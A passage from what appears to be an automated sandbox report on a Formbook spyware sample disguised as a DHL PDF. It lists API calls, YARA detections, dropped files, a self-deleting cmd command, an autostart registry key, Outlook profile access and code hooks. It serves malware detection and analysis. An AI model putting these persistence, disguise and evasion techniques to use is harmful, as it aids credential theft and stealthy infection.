          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B96D0 NtCreateKey,2_2_053B96D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9950 NtQueueApcThread,2_2_053B9950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B99D0 NtCreateProcessEx,2_2_053B99D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9820 NtEnumerateKey,2_2_053B9820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BB040 NtSuspendThread,2_2_053BB040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B98A0 NtWriteVirtualMemory,2_2_053B98A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B98F0 NtReadVirtualMemory,2_2_053B98F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9B00 NtSetValueKey,2_2_053B9B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053BA3B0 NtGetContextThread,2_2_053BA3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A10 NtQuerySection,2_2_053B9A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A00 NtProtectVirtualMemory,2_2_053B9A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053B9A80 NtOpenDirectoryObject,2_2_053B9A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00D854E0 NtDelayExecution,2_2_00D854E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00D8318C NtWriteVirtualMemory,2_2_00D8318C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A50 NtCreateFile,LdrInitializeThunk,7_2_02CA9A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9B00 NtSetValueKey,LdrInitializeThunk,7_2_02CA9B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9840 NtDelayExecution,LdrInitializeThunk,7_2_02CA9840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_02CA9860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA99A0 NtCreateSection,LdrInitializeThunk,7_2_02CA99A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_02CA9910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA96D0 NtCreateKey,LdrInitializeThunk,7_2_02CA96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02CA96E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9650 NtQueryValueKey,LdrInitializeThunk,7_2_02CA9650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02CA9660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9610 NtEnumerateValueKey,LdrInitializeThunk,7_2_02CA9610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9FE0 NtCreateMutant,LdrInitializeThunk,7_2_02CA9FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9780 NtMapViewOfSection,LdrInitializeThunk,7_2_02CA9780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9770 NtSetInformationFile,LdrInitializeThunk,7_2_02CA9770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9710 NtQueryInformationToken,LdrInitializeThunk,7_2_02CA9710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA95D0 NtClose,LdrInitializeThunk,7_2_02CA95D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9540 NtReadFile,LdrInitializeThunk,7_2_02CA9540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9560 NtWriteFile,LdrInitializeThunk,7_2_02CA9560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A80 NtOpenDirectoryObject,7_2_02CA9A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A00 NtProtectVirtualMemory,7_2_02CA9A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A10 NtQuerySection,7_2_02CA9A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9A20 NtResumeThread,7_2_02CA9A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA3B0 NtGetContextThread,7_2_02CAA3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA98F0 NtReadVirtualMemory,7_2_02CA98F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA98A0 NtWriteVirtualMemory,7_2_02CA98A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAB040 NtSuspendThread,7_2_02CAB040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9820 NtEnumerateKey,7_2_02CA9820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA99D0 NtCreateProcessEx,7_2_02CA99D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9950 NtQueueApcThread,7_2_02CA9950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9670 NtQueryInformationProcess,7_2_02CA9670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA97A0 NtUnmapViewOfSection,7_2_02CA97A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9760 NtOpenProcess,7_2_02CA9760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA770 NtOpenThread,7_2_02CAA770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAA710 NtOpenProcessToken,7_2_02CAA710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9730 NtQueryVirtualMemory,7_2_02CA9730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA95F0 NtQueryInformationFile,7_2_02CA95F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CA9520 NtWaitForSingleObject,7_2_02CA9520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CAAD30 NtSetContextThread,7_2_02CAAD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619E70 NtAllocateVirtualMemory,7_2_02619E70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619C90 NtCreateFile,7_2_02619C90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619D40 NtReadFile,7_2_02619D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619DC0 NtClose,7_2_02619DC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619CE3 NtCreateFile,7_2_02619CE3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619C8B NtCreateFile,7_2_02619C8B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02619DBA NtClose,7_2_02619DBA
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004069430_2_00406943
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_0040711A0_2_0040711A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041D0282_2_0041D028
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041D8D12_2_0041D8D1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041BD622_2_0041BD62
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409E2C2_2_00409E2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041E72D2_2_0041E72D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05441D552_2_05441D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05370D202_2_05370D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05396E302_2_05396E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053941202_2_05394120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0537F9002_2_0537F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054310022_2_05431002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0538B0902_2_0538B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053AEBB02_2_053AEBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D322AE7_2_02D322AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2DBD27_2_02D2DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C9EBB07_2_02C9EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32B287_2_02D32B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D328EC7_2_02D328EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7B0907_2_02C7B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C920A07_2_02C920A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D320A87_2_02D320A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D210027_2_02D21002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C6F9007_2_02C6F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C841207_2_02C84120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32EF77_2_02D32EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2D6167_2_02D2D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C86E307_2_02C86E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D31FF17_2_02D31FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2D4667_2_02D2D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7841F7_2_02C7841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D325DD7_2_02D325DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7D5E07_2_02C7D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C925817_2_02C92581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D31D557_2_02D31D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32D077_2_02D32D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C60D207_2_02C60D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02609E2C7_2_02609E2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02609E307_2_02609E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261E72D7_2_0261E72D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602FB07_2_02602FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261BD627_2_0261BD62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602D887_2_02602D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602D907_2_02602D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02C6B150 appears 35 times
          Source: Dhl package - pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Dhl package - pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbapkgui.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/45@3/3
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency
          Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_01
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\nsc735E.tmp
          Source: Dhl package - pdf.exe :: Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe :: File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe :: File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,Piggins
          Source: Dhl package - pdf.exe :: Virustotal: Detection: 29%
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File read: C:\Users\user\Desktop\Dhl package - pdf.exe
          Source: unknown :: Process created: C:\Users\user\Desktop\Dhl package - pdf.exe 'C:\Users\user\Desktop\Dhl package - pdf.exe'
          Source: unknown :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,Piggins
          Source: unknown :: Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknown :: Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknown :: Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknown :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,Piggins
          Source: C:\Windows\SysWOW64\rundll32.exe :: Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\wlanext.exe :: Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\SysWOW64\wlanext.exe :: File written: C:\Users\user\AppData\Roaming\97LP2175\97Llogri.ini
          Source: C:\Windows\SysWOW64\wlanext.exe :: Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Dhl package - pdf.exe :: Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: AvVsPkDH.pdbp0 source: AvVsPkDH.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.231049453.000000000546F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.437951676.0000000002C40000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: wlanext.exe, 00000007.00000002.439456963.000000000316F000.00000004.00000001.sdmp
          Source: Binary string: AvVsPkDH.pdb source: AvVsPkDH.dll.0.dr
          Source: Binary string: wntdll.pdb source: cmd.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: cmd.exe, 00000002.00000002.230678739.0000000003506000.00000004.00000020.sdmp
          Source: Binary string: metade.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: wbemDC.pdb source: wbemDC.dll.0.dr
          Source: Binary string: ActiveSyncBootstrap.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: cmd.pdb source: wlanext.exe, 00000007.00000002.439456963.000000000316F000.00000004.00000001.sdmp
          Source: Binary string: cvtres.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: guidgen.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: wlanext.pdbGCTL source: cmd.exe, 00000002.00000002.230678739.0000000003506000.00000004.00000020.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 1_2_7301561A LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_7301561A
          Source: C:\Windows\SysWOW64\rundll32.exe :: Code function: 1_2_73012B95 push ecx; ret 1_2_73012BA8
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_004178F7 pushfd ; iretd 2_2_004178FE
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_00414D4C pushad ; iretd 2_2_00414D4D
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041CDE5 push eax; ret 2_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_004085A9 push esi; iretd 2_2_004085AD
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041CE32 push eax; ret 2_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041CE3B push eax; ret 2_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041E6E0 push dword ptr [494A20F8h]; ret 2_2_0041E72B
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041CE9C push eax; ret 2_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_0041DFF3 push es; ret 2_2_0041DFFC
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_00416FF8 pushfd ; ret 2_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_00416FA0 pushfd ; ret 2_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exe :: Code function: 2_2_053CD0D1 push ecx; ret 2_2_053CD0E4
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_02CBD0D1 push ecx; ret 7_2_02CBD0E4
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261DA51 push ss; retf 7_2_0261DA5A
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_026178F7 pushfd ; iretd 7_2_026178FE
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261CE32 push eax; ret 7_2_0261CE38
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261CE3B push eax; ret 7_2_0261CEA2
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261E6E0 push dword ptr [494A20F8h]; ret 7_2_0261E72B
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261CE9C push eax; ret 7_2_0261CEA2
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261D741 pushad ; iretd 7_2_0261D6F5
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_02616FF8 pushfd ; ret 7_2_0261709A
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_02616FA0 pushfd ; ret 7_2_0261709A
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_02614D4C pushad ; iretd 7_2_02614D4D
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_0261CDE5 push eax; ret 7_2_0261CE38
          Source: C:\Windows\SysWOW64\wlanext.exe :: Code function: 7_2_026085A9 push esi; iretd 7_2_026085AD
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\pntables\cvtres.exe
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\pntables\AvVsPkDH.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\Conservatory.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency\diffs\ActiveSyncBootstrap.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency\diffs\metade.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\firms\MicrosoftVisualStudioDesignerInterfaces.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency\diffs\guidgen.exe
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency\diffs\vcdeployui.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\toplist\mode\wbemDC.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Local\Temp\pntables\vbapkgui.dll
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe :: File created: C:\Users\user\AppData\Roaming\emergency\diffs\msdnmui.dll

          Boot Survival:

          Creates an undocumented autostart registry key
          Source: C:\Windows\SysWOW64\wlanext.exe :: Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run -ZNHWB7HQB

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe :: User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE7
          Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
